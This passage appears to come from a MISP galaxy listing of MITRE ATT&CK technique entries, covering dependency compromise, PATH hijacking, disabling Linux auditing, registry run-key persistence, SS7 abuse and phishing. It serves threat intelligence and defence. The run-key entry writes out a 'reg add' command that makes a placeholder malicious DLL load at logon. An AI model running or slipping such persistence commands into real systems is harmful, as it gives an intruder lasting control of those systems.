kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Modification', 'Firewall: Firewall Rule Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Network']
Related clusters

To see the related clusters, click here.

Compromise Software Dependencies and Development Tools - T1195.001

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

Internal MISP references

UUID 191cc6af-1bb2-4344-ab5f-28e496638720 which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1195.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1195.001
kill_chain ['attack-Linux:initial-access', 'attack-macOS:initial-access', 'attack-Windows:initial-access']
mitre_data_sources ['File: File Metadata']
mitre_platforms ['Linux', 'macOS', 'Windows']
Related clusters

To see the related clusters, click here.

Windows File and Directory Permissions Modification - T1222.001

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Internal MISP references

UUID 34e793de-0274-4982-9c1a-246ed1c19dee which can be used as unique global reference for Windows File and Directory Permissions Modification - T1222.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1222.001
kill_chain ['attack-Windows:defense-evasion']
mitre_data_sources ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Compromise Software Dependencies and Development Tools - T1474.001

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)

Internal MISP references

UUID 7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3 which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1474.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1474.001
kill_chain ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access']
mitre_platforms ['Android', 'iOS']
Related clusters

To see the related clusters, click here.

Path Interception by PATH Environment Variable - T1574.007

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows if an adversary places a malicious program named "net.exe" in C:\example path, which by default precedes C:\Windows\system32\net.exe in the PATH environment variable, when "net" is executed from the command-line the C:\example path will be called instead of the system's legitimate executable at C:\Windows\system32\net.exe. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter.(Citation: ExpressVPN PATH env Windows 2021)

Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, Unix Shell Configuration Modification, or modifying the /etc/paths.d folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)

Internal MISP references

UUID 0c2d00da-7742-49e7-9928-4514e5075d32 which can be used as unique global reference for Path Interception by PATH Environment Variable - T1574.007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.007
kill_chain ['attack-Windows:persistence', 'attack-macOS:persistence', 'attack-Linux:persistence', 'attack-Windows:privilege-escalation', 'attack-macOS:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Linux:defense-evasion']
mitre_data_sources ['File: File Creation', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows', 'macOS', 'Linux']
Related clusters

To see the related clusters, click here.

Path Interception by Search Order Hijacking - T1574.008

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.

Internal MISP references

UUID 58af3705-8740-4c68-9329-ec015a7013c2 which can be used as unique global reference for Path Interception by Search Order Hijacking - T1574.008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.008
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion']
mitre_data_sources ['File: File Creation', 'File: File Modification', 'Process: Process Creation']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Disable or Modify Linux Audit System - T1562.012

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.

Often referred to as auditd, this is the name of the daemon used to write events to disk and is governed by the parameters set in the audit.conf configuration file. Two primary ways to configure the log generation rules are through the command line auditctl utility and the file /etc/audit/audit.rules, containing a sequence of auditctl commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)

With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with auditd daemon or use systemctl to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the /etc/audit/audit.rules or audit.conf files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)

Internal MISP references

UUID 562e9b64-7239-493d-80f4-2bff900d9054 which can be used as unique global reference for Disable or Modify Linux Audit System - T1562.012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.012
kill_chain ['attack-Linux:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Deletion', 'File: File Modification', 'Process: OS API Execution', 'Process: Process Modification']
mitre_platforms ['Linux']
Related clusters

To see the related clusters, click here.

Registry Run Keys / Startup Folder - T1060

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

Placing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.

The startup folder path for the current user is: * C:\Users[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup The startup folder path for all users is: * C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

The following run keys are created by default on Windows systems: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 9422fc14-1c43-410d-ab0f-a709b76c72dc which can be used as unique global reference for Registry Run Keys / Startup Folder - T1060 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1060
kill_chain ['attack-Windows:persistence']
mitre_platforms ['Windows']
Related clusters

To see the related clusters, click here.

Exploit SS7 to Redirect Phone Calls/SMS - T1449

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).

Internal MISP references

UUID fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d which can be used as unique global reference for Exploit SS7 to Redirect Phone Calls/SMS - T1449 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1449
kill_chain ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects']
mitre_platforms ['Android', 'iOS']

Assess security posture of physical locations - T1302

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)

Internal MISP references

UUID 31a57c70-6709-4d06-a473-c3df1f74c1d4 which can be used as unique global reference for Assess security posture of physical locations - T1302 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1302
kill_chain ['pre-attack:organizational-weakness-identification']

Determine domain and IP address space - T1250

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)

Internal MISP references

UUID 23ecb7e0-0340-43d9-80a5-8971fe866ddf which can be used as unique global reference for Determine domain and IP address space - T1250 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1250
kill_chain ['pre-attack:technical-information-gathering']

Research visibility gap of security vendors - T1290

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)

Internal MISP references

UUID b26babc7-9127-4bd5-9750-5e49748c9be3 which can be used as unique global reference for Research visibility gap of security vendors - T1290 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1290
kill_chain ['pre-attack:technical-weakness-identification']

Exploit SS7 to Track Device Location - T1450

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

Internal MISP references

UUID 52651225-0b3a-482d-aa7e-10618fd063b5 which can be used as unique global reference for Exploit SS7 to Track Device Location - T1450 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1450
kill_chain ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects']
mitre_platforms ['Android', 'iOS']
Related clusters

To see the related clusters, click here.

Access Sensitive Data in Device Logs - T1413

On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

Internal MISP references

UUID 29e07491-8947-43a3-8d4e-9a787c45f3d3 which can be used as unique global reference for Access Sensitive Data in Device Logs - T1413 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1413
kill_chain ['mobile-attack-Android:collection', 'mobile-attack-Android:credential-access']
mitre_platforms ['Android']

Stolen Developer Credentials or Signing Keys - T1441

An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer's identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).

Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.

Platforms: Android, iOS

Internal MISP references

UUID a21a6a79-f9a1-4c87-aed9-ba2d79536881 which can be used as unique global reference for Stolen Developer Credentials or Signing Keys - T1441 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1441
Related clusters

To see the related clusters, click here.

Component Object Model and Distributed COM - T1175

This technique has been deprecated. Please use Distributed Component Object Model and Component Object Model.

Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.

COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.

Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.

Internal MISP references

UUID 772bc7a8-a157-42cc-8728-d648e25c7fe7 which can be used as unique global reference for Component Object Model and Distributed COM - T1175 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1175
kill_chain ['attack-Windows:lateral-movement', 'attack-Windows:execution']
mitre_platforms ['Windows']

Develop social network persona digital footprint - T1342

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

Internal MISP references

UUID 271e6d40-e191-421a-8f87-a8102452c201 which can be used as unique global reference for Develop social network persona digital footprint - T1342 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1342
kill_chain ['pre-attack:persona-development']

Assess vulnerability of 3rd party vendors - T1298

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)

Internal MISP references

UUID 1def484d-2343-470d-8925-88f45b5f9615 which can be used as unique global reference for Assess vulnerability of 3rd party vendors - T1298 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1298
kill_chain ['pre-attack:organizational-weakness-identification']

Manipulate App Store Rankings or Ratings - T1452

An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

Internal MISP references

UUID 76c12fc8-a4eb-45d6-a3b7-e371a7248f69 which can be used as unique global reference for Manipulate App Store Rankings or Ratings - T1452 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1452
kill_chain ['mobile-attack-Android:impact', 'mobile-attack-iOS:impact']
mitre_platforms ['Android', 'iOS']
Related clusters

To see the related clusters, click here.

Acquire OSINT data sets and information - T1247

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)

Internal MISP references

UUID 784ff1bc-1483-41fe-a172-4cd9ae25c06b which can be used as unique global reference for Acquire OSINT data sets and information - T1247 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1247
kill_chain ['pre-attack:technical-information-gathering']
Related clusters

To see the related clusters, click here.

Acquire OSINT data sets and information - T1266

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)

Internal MISP references

UUID 2b9a666e-bd59-4f67-9031-ed41b428e04a which can be used as unique global reference for Acquire OSINT data sets and information - T1266 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1266
kill_chain ['pre-attack:people-information-gathering']
Related clusters

To see the related clusters, click here.

Acquire OSINT data sets and information - T1277

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)

Internal MISP references

UUID 028ad431-84c5-4eb7-a364-2b797c234f88 which can be used as unique global reference for Acquire OSINT data sets and information - T1277 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1277
kill_chain ['pre-attack:organizational-information-gathering']
Related clusters

To see the related clusters, click here.

Assess opportunities created by business deals - T1299

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

During mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)

Internal MISP references

UUID e2aa077d-60c9-4de5-b015-a9c382877cd9 which can be used as unique global reference for Assess opportunities created by business deals - T1299 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1299
kill_chain ['pre-attack:organizational-weakness-identification']

SSL certificate acquisition for trust breaking - T1338

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Fake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)

Internal MISP references

UUID 54a42187-a20c-4e4e-ba31-8d15c9e1f57f which can be used as unique global reference for SSL certificate acquisition for trust breaking - T1338 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1338
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Identify resources required to build capabilities - T1348

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)

Internal MISP references

UUID c9fb4451-729d-4771-b205-52c1829f949c which can be used as unique global reference for Identify resources required to build capabilities - T1348 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1348
kill_chain ['pre-attack:build-capabilities']

Hardware or software supply chain implant - T1365

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

During production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)

Internal MISP references

UUID 388f3a5c-2cdd-466c-9159-b507fa429fcd which can be used as unique global reference for Hardware or software supply chain implant - T1365 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1365
kill_chain ['pre-attack:stage-capabilities']

Test malware in various execution environments - T1357

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Malware may perform differently on different platforms (computer vs handheld) and different operating systems (Ubuntu vs OS X), and versions (Windows 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)

Internal MISP references

UUID e042a41b-5ecf-4f3a-8f1f-1b528c534772 which can be used as unique global reference for Test malware in various execution environments - T1357 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1357
kill_chain ['pre-attack:test-capabilities']

Conduct social engineering or HUMINT operation - T1376

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)

Internal MISP references

UUID b79a1960-d0be-4b51-bb62-b27e91e1dea0 which can be used as unique global reference for Conduct social engineering or HUMINT operation - T1376 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1376
kill_chain ['pre-attack:launch']

Spear phishing messages with malicious attachments - T1367

This technique has been deprecated. Please use Spearphishing Attachment.

Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)

Internal MISP references

UUID e24a9f99-cb76-42a3-a50b-464668773e97 which can be used as unique global reference for Spear phishing messages with malicious attachments - T1367 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1367
kill_chain ['pre-attack:launch']

Authorized user performs requested cyber action - T1386

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)

Internal MISP references

UUID 0440f60f-9056-4791-a740-8eae96eb61fa which can be used as unique global reference for Authorized user performs requested cyber action - T1386 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1386
kill_chain ['pre-attack:compromise']

Spear phishing messages with text only - T1368

This technique has been deprecated. Please use Phishing where appropriate.

Emails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)

Internal MISP references

UUID 2fc04aa5-48c1-49ec-919a-b88241ef1d17 which can be used as unique global reference for Spear phishing messages with text only - T1368 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1368
kill_chain ['pre-attack:launch']

This technique has been deprecated. Please use Spearphishing Link.

Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)

Internal MISP references

UUID 489a7797-01c3-4706-8cd1-ec56a9db3adc which can be used as unique global reference for Spear phishing messages with malicious links - T1369 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1369
kill_chain ['pre-attack:launch']

Unauthorized user introduces compromise delivery mechanism - T1387

This technique has been deprecated. Please use Hardware Additions where appropriate.

If an adversary can gain physical access to the target's environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)

Internal MISP references

UUID b3253d9e-ba11-430f-b5a3-4db844ce5413 which can be used as unique global reference for Unauthorized user introduces compromise delivery mechanism - T1387 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1387
kill_chain ['pre-attack:compromise']

Deliver Malicious App via Other Means - T1476

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.

Delivery methods for the malicious application include:

  • Spearphishing Attachment - Including the mobile app package as an attachment to an email message.
  • Spearphishing Link - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.
  • Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)

Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

Internal MISP references

UUID 53263a67-075e-48fa-974b-91c5b5445db7 which can be used as unique global reference for Deliver Malicious App via Other Means - T1476 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1476
kill_chain ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access']
mitre_platforms ['Android', 'iOS']

Upload, install, and configure software/tools - T1362

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

